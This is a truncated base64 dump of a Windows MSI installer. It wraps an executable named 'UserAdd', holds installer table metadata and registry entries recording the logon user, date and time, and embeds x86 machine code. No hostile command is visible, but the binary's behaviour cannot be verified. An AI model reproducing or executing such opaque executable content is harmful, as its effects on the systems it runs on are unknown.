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5hbWU7UGF0aHM7QW55UGF0aDtXaWxkQ2FyZEZpbGVuYW1lO1JlZ1BhdGg7Q3VzdG9tU291cmNlO1Byb3BlcnR5O0NhYmluZXQ7U2hvcnRjdXQ7Rm9ybWF0dGVkU0RETFRleHQ7SW50ZWdlcjtEb3VibGVJbnRlZ2VyO1RpbWVEYXRlO0RlZmF1bHREaXJTdHJpbmcgY2F0ZWdvcnlUZXh0U2V0IG9mIHZhbHVlcyB0aGF0IGFyZSBwZXJtaXR0ZWREZXNjcmlwdGlvbiBvZiBjb2x1bW5BZG1pbkV4ZWN1dGVTZXF1ZW5jZUFjdGlvbk5hbWUgb2YgYWN0aW9uIHRvIGludm9rZSwgZWl0aGVyIGluIHRoZSBlbmdpbmUgb3IgdGhlIGhhbmRsZXIgRExMLkNvbmRpdGlvbk9wdGlvbmFsIGV4cHJlc3Npb24gd2hpY2ggc2tpcHMgdGhlIGFjdGlvbiBpZiBldmFsdWF0ZXMgdG8gZXhwRmFsc2UuSWYgdGhlIGV4cHJlc3Npb24gc3ludGF4IGlzIGludmFsaWQsIHRoZSBlbmdpbmUgd2lsbCB0ZXJtaW5hdGUsIHJldHVybmluZyBpZXNCYWRBY3Rpb25EYXRhLlNlcXVlbmNlTnVtYmVyIHRoYXQgZGV0ZXJtaW5lcyB0aGUgc29ydCBvcmRlciBpbiB3aGljaCB0aGUgYWN0aW9ucyBhcmUgdG8gYmUgZXhlY3V0ZWQuICBMZWF2ZSBibGFuayB0byBzdXBwcmVzcyBhY3Rpb24uQWRtaW5VSVNlcXVlbmNlQWR2dEV4ZWN1dGVTZXF1ZW5jZUJpbmFyeVVuaXF1ZSBrZXkgaWRlbnRpZnlpbmcgdGhlIGJpbmFyeSBkYXRhLkRhdGFUaGUgdW5mb3JtYXR0ZWQgYmluYXJ5IGRhdGEuQ29tcG9uZW50UHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgY29tcG9uZW50IHJlY29yZC5Db21wb25lbnRJZEd1aWRBIHN0cmluZyBHVUlEIHVuaXF1ZSB0byB0aGlzIGNvbXBvbmVudCwgdmVyc2lvbiwgYW5kIGxhbmd1YWdlLkRpcmVjdG9yeV9EaXJlY3RvcnlSZXF1aXJlZCBrZXkgb2YgYSBEaXJlY3RvcnkgdGFibGUgcmVjb3JkLiBUaGlzIGlzIGFjdHVhbGx5IGEgcHJvcGVydHkgbmFtZSB3aG9zZSB2YWx1ZSBjb250YWlucyB0aGUgYWN0dWFsIHBhdGgsIHNldCBlaXRoZXIgYnkgdGhlIEFwcFNlYXJjaCBhY3Rpb24gb3Igd2l0aCB0aGUgZGVmYXVsdCBzZXR0aW5nIG9idGFpbmVkIGZyb20gdGhlIERpcmVjdG9yeSB0YWJsZS5BdHRyaWJ1dGVzUmVtb3RlIGV4ZWN1dGlvbiBvcHRpb24sIG9uZSBvZiBpcnNFbnVtQSBjb25kaXRpb25hbCBzdGF0ZW1lbnQgdGhhdCB3aWxsIGRpc2FibGUgdGhpcyBjb21wb25lbnQgaWYgdGhlIHNwZWNpZmllZCBjb25kaXRpb24gZXZhbHVhdGVzIHRvIHRoZSAnVHJ1ZScgc3RhdGUuIElmIGEgY29tcG9uZW50IGlzIGRpc2FibGVkLCBpdCB3aWxsIG5vdCBiZSBpbnN0YWxsZWQsIHJlZ2FyZGxlc3Mgb2YgdGhlICdBY3Rpb24nIHN0YXRlIGFzc29jaWF0ZWQgd2l0aCB0aGUgY29tcG9uZW50LktleVBhdGhGaWxlO1JlZ2lzdHJ5O09EQkNEYXRhU291cmNlRWl0aGVyIHRoZSBwcmltYXJ5IGtleSBpbnRvIHRoZSBGaWxlIHRhYmxlLCBSZWdpc3RyeSB0YWJsZSwgb3IgT0RCQ0RhdGFTb3VyY2UgdGFibGUuIFRoaXMgZXh0cmFjdCBwYXRoIGlzIHN0b3JlZCB3aGVuIHRoZSBjb21wb25lbnQgaXMgaW5zdGFsbGVkLCBhbmQgaXMgdXNlZCB0byBkZXRlY3QgdGhlIHByZXNlbmNlIG9mIHRoZSBjb21wb25lbnQgYW5kIHRvIHJldHVybiB0aGUgcGF0aCB0byBpdC5DdXN0b21BY3Rpb25QcmltYXJ5IGtleSwgbmFtZSBvZiBhY3Rpb24sIG5vcm1hbGx5IGFwcGVhcnMgaW4gc2VxdWVuY2UgdGFibGUgdW5sZXNzIHByaXZhdGUgdXNlLlRoZSBudW1lcmljIGN1c3RvbSBhY3Rpb24gdHlwZSwgY29uc2lzdGluZyBvZiBzb3VyY2UgbG9jYXRpb24sIGNvZGUgdHlwZSwgZW50cnksIG9wdGlvbiBmbGFncy5Tb3VyY2VDdXN0b21Tb3VyY2VUaGUgdGFibGUgcmVmZXJlbmNlIG9mIHRoZSBzb3VyY2Ugb2YgdGhlIGNvZGUuVGFyZ2V0Rm9ybWF0dGVkRXhjZWN1dGlvbiBwYXJhbWV0ZXIsIGRlcGVuZHMgb24gdGhlIHR5cGUgb2YgY3VzdG9tIGFjdGlvbkV4dGVuZGVkVHlwZUEgbnVtZXJpYyBjdXN0b20gYWN0aW9uIHR5cGUgdGhhdCBleHRlbmRzIGNvZGUgdHlwZSBvciBvcHRpb24gZmxhZ3Mgb2YgdGhlIFR5cGUgY29sdW1uLlVuaXF1ZSBpZGVudGlmaWVyIGZvciBkaXJlY3RvcnkgZW50cnksIHByaW1hcnkga2V5LiBJZiBhIHByb3BlcnR5IGJ5IHRoaXMgbmFtZSBpcyBkZWZpbmVkLCBpdCBjb250YWlucyB0aGUgZnVsbCBwYXRoIHRvIHRoZSBkaXJlY3RvcnkuRGlyZWN0b3J5X1BhcmVudFJlZmVyZW5jZSB0byB0aGUgZW50cnkgaW4gdGhpcyB0YWJsZSBzcGVjaWZ5aW5nIHRoZSBkZWZhdWx0IHBhcmVudCBkaXJlY3RvcnkuIEEgcmVjb3JkIHBhcmVudGVkIHRvIGl0c2VsZiBvciB3aXRoIGEgTnVsbCBwYXJlbnQgcmVwcmVzZW50cyBhIHJvb3Qgb2YgdGhlIGluc3RhbGwgdHJlZS5EZWZhdWx0RGlyVGhlIGRlZmF1bHQgc3ViLXBhdGggdW5kZXIgcGFyZW50J3MgcGF0aC5GZWF0dXJlUHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgZmVhdHVyZSByZWNvcmQuRmVhdHVyZV9QYXJlbnRPcHRpb25hbCBrZXkgb2YgYSBwYXJlbnQgcmVjb3JkIGluIHRoZSBzYW1lIHRhYmxlLiBJZiB0aGUgcGFyZW50IGlzIG5vdCBzZWxlY3RlZCwgdGhlbiB0aGUgcmVjb3JkIHdpbGwgbm90IGJlIGluc3RhbGxlZC4gTnVsbCBpbmRpY2F0ZXMgYSByb290IGl0ZW0uVGl0bGVTaG9ydCB0ZXh0IGlkZW50aWZ5aW5nIGEgdmlzaWJsZSBmZWF0dXJlIGl0ZW0uTG9uZ2VyIGRlc2NyaXB0aXZlIHRleHQgZGVzY3JpYmluZyBhIHZpc2libGUgZmVhdHVyZSBpdGVtLkRpc3BsYXlOdW1lcmljIHNvcnQgb3JkZXIsIHVzZWQgdG8gZm9yY2UgYSBzcGVjaWZpYyBkaXNwbGF5IG9yZGVyaW5nLkxldmVsVGhlIGluc3RhbGwgbGV2ZWwgYXQgd2hpY2ggcmVjb3JkIHdpbGwgYmUgaW5pdGlhbGx5IHNlbGVjdGVkLiBBbiBpbnN0YWxsIGxldmVsIG9mIDAgd2lsbCBkaXNhYmxlIGFuIGl0ZW0gYW5kIHByZXZlbnQgaXRzIGRpc3BsYXkuVXBwZXJDYXNlVGhlIG5hbWUgb2YgdGhlIERpcmVjdG9yeSB0aGF0IGNhbiBiZSBjb25maWd1cmVkIGJ5IHRoZSBVSS4gQSBub24tbnVsbCB2YWx1ZSB3aWxsIGVuYWJsZSB0aGUgYnJvd3NlIGJ1dHRvbi4wOzE7Mjs0OzU7Njs4Ozk7MTA7MTY7MTc7MTg7MjA7MjE7MjI7MjQ7MjU7MjY7MzI7MzM7MzQ7MzY7Mzc7Mzg7NDg7NDk7NTA7NTI7NTM7NTRGZWF0dXJlIGF0dHJpYnV0ZXNGZWF0dXJlQ29tcG9uZW50c0ZlYXR1cmVfRm9yZWlnbiBrZXkgaW50byBGZWF0dXJlIHRhYmxlLkNvbXBvbmVudF9Gb3JlaWduIGtleSBpbnRvIENvbXBvbmVudCB0YWJsZS5GaWxlUHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4sIG11c3QgbWF0Y2ggaWRlbnRpZmllciBpbiBjYWJpbmV0LiAgRm9yIHVuY29tcHJlc3NlZCBmaWxlcywgdGhpcyBmaWVsZCBpcyBpZ25vcmVkLkZvcmVpZ24ga2V5IHJlZmVyZW5jaW5nIENvbXBvbmVudCB0aGF0IGNvbnRyb2xzIHRoZSBmaWxlLkZpbGVOYW1lRmlsZW5hbWVGaWxlIG5hbWUgdXNlZCBmb3IgaW5zdGFsbGF0aW9uLCBtYXkgYmUgbG9jYWxpemVkLiAgVGhpcyBtYXkgY29udGFpbiBhICJzaG9ydCBuYW1lfGxvbmcgbmFtZSIgcGFpci5GaWxlU2l6ZVNpemUgb2YgZmlsZSBpbiBieXRlcyAobG9uZyBpbnRlZ2VyKS5WZXJzaW9uVmVyc2lvbiBzdHJpbmcgZm9yIHZlcnNpb25lZCBmaWxlczsgIEJsYW5rIGZvciB1bnZlcnNpb25lZCBmaWxlcy5MYW5ndWFnZUxpc3Qgb2YgZGVjaW1hbCBsYW5ndWFnZSBJZHMsIGNvbW1hLXNlcGFyYXRlZCBpZiBtb3JlIHRoYW4gb25lLkludGVnZXIgY29udGFpbmluZyBiaXQgZmxhZ3MgcmVwcmVzZW50aW5nIGZpbGUgYXR0cmlidXRlcyAod2l0aCB0aGUgZGVjaW1hbCB2YWx1ZSBvZiBlYWNoIGJpdCBwb3NpdGlvbiBpbiBwYXJlbnRoZXNlcylTZXF1ZW5jZSB3aXRoIHJlc3BlY3QgdG8gdGhlIG1lZGlhIGltYWdlczsgb3JkZXIgbXVzdCB0cmFjayBjYWJpbmV0IG9yZGVyLkljb25QcmltYXJ5IGtleS4gTmFtZSBvZiB0aGUgaWNvbiBmaWxlLkJpbmFyeSBzdHJlYW0uIFRoZSBiaW5hcnkgaWNvbiBkYXRhIGluIFBFICguRExMIG9yIC5FWEUpIG9yIGljb24gKC5JQ08pIGZvcm1hdC5JbnN0YWxsRXhlY3V0ZVNlcXVlbmNlSW5zdGFsbFVJU2VxdWVuY2VMYXVuY2hDb25kaXRpb25FeHByZXNzaW9uIHdoaWNoIG11c3QgZXZhbHVhdGUgdG8gVFJVRSBpbiBvcmRlciBmb3IgaW5zdGFsbCB0byBjb21tZW5jZS5Mb2NhbGl6YWJsZSB0ZXh0IHRvIGRpc3BsYXkgd2hlbiBjb25kaXRpb24gZmFpbHMgYW5kIGluc3RhbGwgbXVzdCBhYm9ydC5NZWRpYURpc2tJZFByaW1hcnkga2V5LCBpbnRlZ2VyIHRvIGRldGVybWluZSBzb3J0IG9yZGVyIGZvciB0YWJsZS5MYXN0U2VxdWVuY2VGaWxlIHNlcXVlbmNlIG51bWJlciBmb3IgdGhlIGxhc3QgZmlsZSBmb3IgdGhpcyBtZWRpYS5EaXNrUHJvbXB0RGlzayBuYW1lOiB0aGUgdmlzaWJsZSB0ZXh0IGFjdHVhbGx5IHByaW50ZWQgb24gdGhlIGRpc2suICBUaGlzIHdpbGwgYmUgdXNlZCB0byBwcm9tcHQgdGhlIHVzZXIgd2hlbiB0aGlzIGRpc2sgbmVlZHMgdG8gYmUgaW5zZXJ0ZWQuQ2FiaW5ldElmIHNvbWUgb3IgYWxsIG9mIHRoZSBmaWxlcyBzdG9yZWQgb24gdGhlIG1lZGlhIGFyZSBjb21wcmVzc2VkIGluIGEgY2FiaW5ldCwgdGhlIG5hbWUgb2YgdGhhdCBjYWJpbmV0LlZvbHVtZUxhYmVsVGhlIGxhYmVsIGF0dHJpYnV0ZWQgdG8gdGhlIHZvbHVtZS5Qcm9wZXJ0eVRoZSBwcm9wZXJ0eSBkZWZpbmluZyB0aGUgbG9jYXRpb24gb2YgdGhlIGNhYmluZXQgZmlsZS5OYW1lIG9mIHByb3BlcnR5LCB1cHBlcmNhc2UgaWYgc2V0dGFibGUgYnkgbGF1bmNoZXIgb3IgbG9hZGVyLlN0cmluZyB2YWx1ZSBmb3IgcHJvcGVydHkuICBOZXZlciBudWxsIG9yIGVtcHR5LlJlZ2lzdHJ5UHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4uUm9vdFRoZSBwcmVkZWZpbmVkIHJvb3Qga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUsIG9uZSBvZiBycmtFbnVtLktleVJlZ1BhdGhUaGUga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUuVGhlIHJlZ2lzdHJ5IHZhbHVlIG5hbWUuVGhlIHJlZ2lzdHJ5IHZhbHVlLkZvcmVpZ24ga2V5IGludG8gdGhlIENvbXBvbmVudCB0YWJsZSByZWZlcmVuY2luZyBjb21wb25lbnQgdGhhdCBjb250cm9scyB0aGUgaW5zdGFsbGluZyBvZiB0aGUgcmVnaXN0cnkgdmFsdWUuVXBncmFkZVVwZ3JhZGVDb2RlVGhlIFVwZ3JhZGVDb2RlIEdVSUQgYmVsb25naW5nIHRvIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC5WZXJzaW9uTWluVGhlIG1pbmltdW0gUHJvZHVjdFZlcnNpb24gb2YgdGhlIHByb2R1Y3RzIGluIHRoaXMgc2V0LiAgVGhlIHNldCBtYXkgb3IgbWF5IG5vdCBpbmNsdWRlIHByb2R1Y3RzIHdpdGggdGhpcyBwYXJ0aWN1bGFyIHZlcnNpb24uVmVyc2lvbk1heFRoZSBtYXhpbXVtIFByb2R1Y3RWZXJzaW9uIG9mIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC4gIFRoZSBzZXQgbWF5IG9yIG1heSBub3QgaW5jbHVkZSBwcm9kdWN0cyB3aXRoIHRoaXMgcGFydGljdWxhciB2ZXJzaW9uLkEgY29tbWEtc2VwYXJhdGVkIGxpc3Qgb2YgbGFuZ3VhZ2VzIGZvciBlaXRoZXIgcHJvZHVjdHMgaW4gdGhpcyBzZXQgb3IgcHJvZHVjdHMgbm90IGluIHRoaXMgc2V0LlRoZSBhdHRyaWJ1dGVzIG9mIHRoaXMgcHJvZHVjdCBzZXQuUmVtb3ZlVGhlIGxpc3Qgb2YgZmVhdHVyZXMgdG8gcmVtb3ZlIHdoZW4gdW5pbnN0YWxsaW5nIGEgcHJvZHVjdCBmcm9tIHRoaXMgc2V0LiAgVGhlIGRlZmF1bHQgaXMgIkFMTCIuQWN0aW9uUHJvcGVydHlUaGUgcHJvcGVydHkgdG8gc2V0IHdoZW4gYSBwcm9kdWN0IGluIHRoaXMgc2V0IGlzIGZvdW5kLkNvc3RJbml0aWFsaXplRmlsZUNvc3RDb3N0RmluYWxpemVJbnN0YWxsVmFsaWRhdGVJbnN0YWxsSW5pdGlhbGl6ZUluc3RhbGxBZG1pblBhY2thZ2VJbnN0YWxsRmlsZXNJbnN0YWxsRmluYWxpemVFeGVjdXRlQWN0aW9uUHVibGlzaEZlYXR1cmVzUHVibGlzaFByb2R1Y3Riei5XcmFwcGVkU2V0dXBQcm9ncmFtYnouQ3VzdG9tQWN0aW9uRGxsYnouUHJvZHVjdENvbXBvbmVudHtFREUxMEY2Qy0zMEY0LTQyQ0EtQjVDNy1BREI5MDVFNDVCRkN9QlouSU5TVEFMTEZPTERFUnJlZzlDQUU1N0FGN0I5RkI0RUYyNzA2Rjk1QjRCODNCNDE5U2V0UHJvcGVydHlGb3JEZWZlcnJlZGJ6Lk1vZGlmeVJlZ2lzdHJ5W0JaLldSQVBQRURfQVBQSURdYnouU3Vic3RXcmFwcGVkQXJndW1lbnRzX1N1YnN0V3JhcHBlZEFyZ3VtZW50c0A0YnouUnVuV3JhcHBlZFNldHVwW2J6LlNldHVwU2l6ZV0gIltTb3VyY2VEaXJdXC4iIFtCWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVNdICpbQlouRklYRURfSU5TVEFMTF9BUkdVTUVOVFNdW1dSQVBQRURfQVJHVU1FTlRTXV9Nb2RpZnlSZWdpc3RyeUA0YnouVW5pbnN0YWxsV3JhcHBlZF9Vbmluc3RhbGxXcmFwcGVkQDRQcm9ncmFtRmlsZXNGb2xkZXJieGp2aWx3N3xbQlouQ09NUEFOWU5BTUVdVEFSR0VURElSLlNvdXJjZURpclByb2R1Y3RGZWF0dXJlTWFpbiBGZWF0dXJlRmluZFJlbGF0ZWRQcm9kdWN0c0xhdW5jaENvbmRpdGlvbnNWYWxpZGF0ZVByb2R1Y3RJRE1pZ3JhdGVGZWF0dXJlU3RhdGVzUHJvY2Vzc0NvbXBvbmVudHNVbnB1Ymxpc2hGZWF0dXJlc1JlbW92ZVJlZ2lzdHJ5VmFsdWVzV3JpdGVSZWdpc3RyeVZhbHVlc1JlZ2lzdGVyVXNlclJlZ2lzdGVyUHJvZHVjdFJlbW92ZUV4aXN0aW5nUHJvZHVjdHNOT1QgUkVNT1ZFIH49IkFMTCIgQU5EIE5PVCBVUEdSQURFUFJPRFVDVENPREVSRU1PVkUgfj0gIkFMTCIgQU5EIE5PVCBVUEdSQURJTkdQUk9EVUNUQ09ERU5PVCBXSVhfRE9XTkdSQURFX0RFVEVDVEVERG93bmdyYWRlcyBhcmUgbm90IGFsbG93ZWQuQUxMVVNFUlMxQVJQTk9SRVBBSVJBUlBOT01PRElGWUJaLlZFUkZCWi5DT01QQU5ZTkFNRUVYRU1TSS5DT01CWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVMwQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSU5PTkVfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJQkFTSUNfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJUkVEVUNFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlGVUxMX1VOSU5TVEFMTF9BUkdVTUVOVFNiei5TZXR1cFNpemU5NzI4TWFudWZhY3R1cmVyUHJvZHVjdENvZGV7RDgyQUY2ODAtN0FDQS00QTQ4LUFFNTgtQUNCOEVFNDAwRDQyfVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZVVzZXJBZGQgKFdyYXBwZWQgdXNpbmcgTVNJIFdyYXBwZXIgZnJvbSB3d3cuZXhlbXNpLmNvbSlQcm9kdWN0VmVyc2lvbjEuMC4wLjBXSVhfVVBHUkFERV9ERVRFQ1RFRFNlY3VyZUN1c3RvbVByb3BlcnRpZXNXSVhfRE9XTkdSQURFX0RFVEVDVEVEO1dJWF9VUEdSQURFX0RFVEVDVEVEU09GVFdBUkVcW0JaLkNPTVBBTllOQU1FXVxNU0kgV3JhcHBlclxJbnN0YWxsZWRcW0JaLldSQVBQRURfQVBQSURdTG9nb25Vc2VyW0xvZ29uVXNlcl1yZWcwNDkzNzZERTM1MTY0MjY2QTZGM0FDNDYxQjgxM0ZBNVVTRVJOQU1FW1VTRVJOQU1FXXJlZ0FGODhFMTMzNjZBMTc5QzRFQkZGNzYzRUVBM0RBMjA3RGF0ZVtEYXRlXXJlZzlCRjBGQzAxQUMxQTNBRDEzQTkzMEIwNjYyRTQyMzM0VGltZVtUaW1lXXJlZzRERDA4NzdDNjREN0ZGOTk1OUI0OEJDNUIwOTg1RURFV1JBUFBFRF9BUkdVTUVOVFNbV1JBUFBFRF9BUkdVTUVOVFNdV0lYX0RPV05HUkFERV9ERVRFQ1RFRFBvd2VyVXB7MTk5MWRmYWEtNWM1Mi00YTRiLWIyYWMtNmNkN2I2ZDk4ZTkxfYPEFDhd9HQHi0Xwg2Bw/TPA6aQBAAA5XRR0DIN9FAJ8yoN9FCR/xFYPtzeJXfyDxwLrBQ+3N0dHjUXoUGoIVuhHWAAAg8QMhcB16GaD/i11BoNNGALrBmaD/it1BQ+3N0dHOV0UdTNW6ENWAABZhcB0CcdFFAoAAADrRg+3B2aD+Hh0D2aD+Fh0CcdFFAgAAADrLsdFFBAAAACDfRQQdSFW6ApWAABZhcB1Fg+3B2aD+Hh0BmaD+Fh1B0dHD7c3R0eDyP8z0vd1FIlV+IvYVujcVQAAWYP4/3UpakFYZjvGdwZmg/5adgmNRp9mg/gZdzGNRp9mg/gZD7fGdwOD6CCDwMk7RRRzGoNNGAg5XfxyKXUFO0X4diKDTRgEg30QAHUki0UYT0+oCHUig30QAHQDi30Mg2X8AOtdi038D69NFAPIiU38D7c3R0frgb7///9/qAR1G6gBdT2D4AJ0CYF9/AAAAIB3CYXAdSs5dfx2Juj4+f//9kUYAccAIgAAAHQGg038/+sP9kUYAmoAWA+VwAPGiUX8i0UQXoXAdAKJOPZFGAJ0A/dd/IB99AB0B4tF8INgcP2LRfxfW8nDi/9Vi+wzwFD/dRD/dQz/dQg5BcQoQQB1B2gwHEEA6wFQ6OD9//+DxBRdw7iAEUEAw6HAPEEAVmoUXoXAdQe4AAIAAOsGO8Z9B4vGo8A8QQBqBFDokEUAAFlZo7wsQQCFwHUeagRWiTXAPEEA6HdFAABZWaO8LEEAhcB1BWoaWF7DM9K5gBFBAOsFobwsQQCJDAKDwSCDwgSB+QAUQQB86mr+XjPSuZARQQBXi8LB+AWLBIWgK0EAi/qD5x/B5waLBAeD+P90CDvGdASFwHUCiTGDwSBCgfnwEUEAfM5fM8Bew+g4CwAAgD1kI0EAAHQF6KJWAAD/NbwsQQDoKCEAAFnDi/9Vi+xWi3UIuIARQQA78HIigf7gE0EAdxqLzivIwfkFg8EQUeiGWAAAgU4MAIAAAFnrCoPGIFb/FVTgQABeXcOL/1WL7ItFCIP4FH0Wg8AQUOhZWAAAi0UMgUgMAIAAAFldw4tFDIPAIFD/FVTgQABdw4v/VYvsi0UIuYARQQA7wXIfPeATQQB3GIFgDP9///8rwcH4BYPAEFDoNlcAAFldw4PAIFD/FVjgQABdw4v/VYvsi00Ig/kUi0UMfROBYAz/f///g8EQUegHVwAAWV3Dg8AgUP8VWOBAAF3Di/9Vi+yD7BChQCpBAFNWi3UMVzP/iUX8iX30iX34iX3w6wJGRmaDPiB0+A+3BoP4YXQ4g/hydCuD+Hd0H+iO9///V1dXV1fHABYAAADoFvf//4PEFDPA6VMCAAC7AQMAAOsNM9uDTfwB6wm7CQEAAINN/AIzyUFGRg+3BmY7xw+E2wEAALoAQAAAO88PhCABAAAPt8CD+FMPj5oAAAAPhIMAAACD6CAPhPcAAACD6At0Vkh0